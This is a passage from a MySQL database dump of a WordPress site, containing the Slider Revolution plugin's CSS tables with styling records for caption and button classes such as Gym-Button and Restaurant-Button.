"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"12px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0.35\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"-20%\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(100,'.tp-caption.NotGeneric-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"1\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\",\"text-align\":\"left\"},\"hover\":\"\"}'),(101,'.tp-caption.NotGeneric-BigButton','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"14px\",\"line-height\":\"14px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"27px\",\"30px\",\"27px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.15\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(102,'.tp-caption.WebProduct-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#333333\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"48px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0px\",\"40px\",\"0px\",\"40px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"2\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}'),(103,'.tp-caption.Restaurant-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffe081\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#0a0a0a\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}'),(104,'.tp-caption.Gym-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power1.inOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#8bc027\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}'),(105,'.tp-caption.Gym-Button-Light','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#72a800\",\"background-transparency\":\"0\",\"border-color\":\"#8bc027\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"power2.inOut\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}'),(106,'.tp-caption.Sports-Button-Light','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(107,'.tp-caption.Sports-Button-Red','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"500\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"12px\",\"35px\",\"12px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#db1c22\",\"background-transparency\":\"1\",\"border-color\":\"#db1c22\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}'),(108,'.tp-caption.Photography-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"power3.out\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}'),(109,'.tp-caption.Newspaper-Button-2','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"none\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}','{\"idle\":\"\",\"hover\":\"\"}');
/*!40000 ALTER TABLE `wp_revslider_css` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_revslider_css_bkp`
--

DROP TABLE IF EXISTS `wp_revslider_css_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_css_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text NOT NULL,
  `settings` longtext,
  `hover` longtext,
  `params` longtext NOT NULL,
  `advanced` longtext,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=48 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_revslider_css_bkp`
--

LOCK TABLES `wp_revslider_css_bkp` WRITE;
/*!40000 ALTER TABLE `wp_revslider_css_bkp` DISABLE KEYS */;
INSERT INTO `wp_revslider_css_bkp` VALUES (1,'.tp-caption.medium_grey',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"padding\":\"2px 4px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#888\",\"white-space\":\"nowrap\"}',NULL),(2,'.tp-caption.small_text',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"14px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}',NULL),(3,'.tp-caption.medium_text',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}',NULL),(4,'.tp-caption.large_text',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}',NULL),(5,'.tp-caption.very_large_text',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"letter-spacing\":\"-2px\"}',NULL),(6,'.tp-caption.very_big_white',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"padding\":\"0px 4px\",\"padding-top\":\"1px\",\"background-color\":\"#000\"}',NULL),(7,'.tp-caption.very_big_black',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"padding\":\"0px 4px\",\"padding-top\":\"1px\",\"background-color\":\"#fff\"}',NULL),(8,'.tp-caption.modern_medium_fat',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}',NULL),(9,'.tp-caption.modern_medium_fat_white',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}',NULL),(10,'.tp-caption.modern_medium_light',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}',NULL),(11,'.tp-caption.modern_big_bluebg',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#4e5b6c\",\"letter-spacing\":\"0\"}',NULL),(12,'.tp-caption.modern_big_redbg',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"padding-top\":\"1px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#de543e\",\"letter-spacing\":\"0\"}',NULL),(13,'.tp-caption.modern_small_text_dark',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#555\",\"text-shadow\":\"none\",\"font-size\":\"14px\",\"line-height\":\"22px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}',NULL),(14,'.tp-caption.boxshadow',NULL,NULL,'{\"-moz-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"-webkit-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\"}',NULL),(15,'.tp-caption.black',NULL,NULL,'{\"color\":\"#000\",\"text-shadow\":\"none\"}',NULL),(16,'.tp-caption.noshadow',NULL,NULL,'{\"text-shadow\":\"none\"}',NULL),(17,'.tp-caption.thinheadline_dark',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"rgba(0,0,0,0.85)\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}',NULL),(18,'.tp-caption.thintext_dark',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"rgba(0,0,0,0.85)\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"16px\",\"line-height\":\"26px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}',NULL),(19,'.tp-caption.largeblackbg',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#000\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}',NULL),(20,'.tp-caption.largepinkbg',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#db4360\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}',NULL),(21,'.tp-caption.largewhitebg',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#fff\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}',NULL),(22,'.tp-caption.largegreenbg',NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#67ae73\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}',NULL),(23,'.tp-caption.excerpt',NULL,NULL,'{\"font-size\":\"36px\",\"line-height\":\"36px\",\"font-weight\":\"700\",\"font-family\":\"Arial\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"rgba(0, 0, 0, 1)\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"letter-spacing\":\"-1.5px\",\"padding\":\"1px 4px 0px 4px\",\"width\":\"150px\",\"white-space\":\"normal !important\",\"height\":\"auto\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 255, 255)\",\"border-style\":\"none\"}',NULL),(24,'.tp-caption.large_bold_grey',NULL,NULL,'{\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(25,'.tp-caption.medium_thin_grey',NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 